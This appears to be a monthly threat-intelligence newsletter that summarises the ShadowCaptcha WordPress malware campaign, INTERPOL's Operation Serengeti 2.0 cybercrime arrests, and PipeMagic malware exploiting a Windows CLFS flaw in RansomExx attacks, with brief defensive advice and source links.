This month focuses on the ShadowCaptcha Campaign targeting WordPress sites, INTERPOL’s Operation Serengeti 2.0, and the PipeMagic RansomExx Malware exploiting a Microsoft Windows Vulnerability.

Compromised WordPress sites exploited by ShadowCaptcha

ShadowCaptcha, first detected in August 2025, has so far exploited over 100 compromised WordPress sites to deliver stealers, ransomware, and crypto miners.

Summary

• Visitors to infected sites are redirected via injected JavaScript to fake CAPTCHA pages posing as Cloudflare or Google.
• Outcomes include deployment of Lumma and Rhadamanthys stealers, Epsilon Red ransomware, and sometimes XMRig-based cryptocurrency miners.
• Campaigns employ anti-debugging, DLL side-loading, and clipboard manipulation (copying commands automatically) to enhance stealth and execution.
• Some miners use Pastebin for dynamic configuration, and attackers deploy vulnerable drivers like WinRing0x64.sys to boost mining efficiency at kernel level.
• Researchers suspect compromises stem from plugin exploits and stolen WordPress administrator credentials.
• ShadowCaptcha illustrates the evolution of social engineering into full-spectrum cyber operations, blending living-off-the-land binaries, obfuscation, and layered payloads.
• In parallel, GoDaddy detailed the Help TDS system (active since 2017), which powers tech support scams, credential theft, and malicious WordPress plugins like woocommerce_inputs, installed on over 10,000 sites worldwide.
• We recommend user awareness training, enabling MFA on WordPress, patching plugins, and network segmentation to limit spread.

• Read more about it here

INTERPOL’s Operation Serengeti 2.0

Operation Serengeti 2.0 (June–August 2025) led to 1,209 arrests across 18 African countries, targeting cybercriminals involved in ransomware, scams, and BEC attacks.

Summary

• Authorities recovered $97.4 million and dismantled 11,432 malicious infrastructures, highlighting the scale of global cybercrime.
• In Angola, police shut down 25 illegal cryptocurrency mining centers, arresting 60 Chinese nationals and seizing $37 million worth of power stations, mining rigs, and IT equipment.
• Zambia dismantled a massive online investment fraud that scammed 65,000 victims out of $300 million, arresting 15 suspects and seizing domains, accounts, and SIM cards.
• A transnational inheritance scam originating in Germany was dismantled, with the primary suspect arrested and valuables worth $1.6 million confiscated.
• INTERPOL emphasized that the operation builds stronger cross-border cooperation, intelligence sharing, and investigative capacity among member countries.
• Private partners like Group-IB and TRM Labs provided intelligence on cryptocurrency scams, BEC campaigns, and ransomware groups such as Bl00dy and RansomHub.
• Participating countries included Angola, Nigeria, Ghana, South Africa, Kenya, Zambia, Rwanda, Mauritius, Seychelles, and the U.K., among others.
• The crackdown coincided with Nigeria deporting 102 convicted foreign nationals (60 Chinese, 39 Filipinos, and others) linked to cyber fraud and cyber terrorism.
• The campaign follows earlier operations like Red Card (Nov 2024–Feb 2025), which resulted in 306 arrests and 1,842 device seizures, showing continuity in global anti-cybercrime efforts.
• Read more about it on the Interpol Website.

PipeMagic RansomwareExx Malware Exploiting Microsoft Windows Vulnerability

Cybersecurity researchers revealed that threat actors exploited CVE-2025-29824, a Windows CLFS privilege escalation flaw patched in April 2025, to deploy PipeMagic malware in RansomExx ransomware attacks.

Summary

• PipeMagic, first documented in 2022, acts as a modular backdoor capable of remote access, command execution, and payload delivery.
• Earlier infection chains included exploits like CVE-2017-0144 (EternalBlue SMB flaw) and fake ChatGPT apps used as lures in 2024 attacks in Saudi Arabia.
• Microsoft attributes recent attacks using CVE-2025-29824 and PipeMagic to a threat group tracked as Storm-2460.
• A unique trait of PipeMagic is its encrypted communication via named pipes, generating random 16-byte identifiers for covert payload transmission.
• The malware is plugin-based and uses Microsoft Azure-hosted infrastructure; in 2025 attacks, a malicious Microsoft Help Index file (metafile.mshi) acted as a loader.
• The loader unpacks C# shellcode, which decrypts and executes embedded executables, with variants also using DLL hijacking disguised as Chrome updates.
• PipeMagic’s modules include: Asynchronous communication for file operations, Loader for injecting payloads, and Injector for launching C# executables.

• The 2025 variants show improved persistence and lateral movement, using tools like renamed ProcDump (dllhost.exe) to steal LSASS memory.
• PipeMagic’s modular C2 framework allows dynamic payload execution, granular control, and stealthy memory-only operations using doubly linked lists instead of disk storage.
• Attacks linked to Storm-2460 span IT, financial, and real estate sectors across the U.S., Europe, South America, and the Middle East, highlighting its global reach.
• Read more about it here

Sources

• https://www.betterworldtechnology.com/post/shadowcaptcha-campaign-targets-wordpress-sites-with-malware
• https://www.interpol.int/en/News-and-Events/News/2025/African-authorities-dismantle-massive-cybercrime-and-fraud-networks-recover-millions
• https://thehackernews.com/2025/08/microsoft-windows-vulnerability.html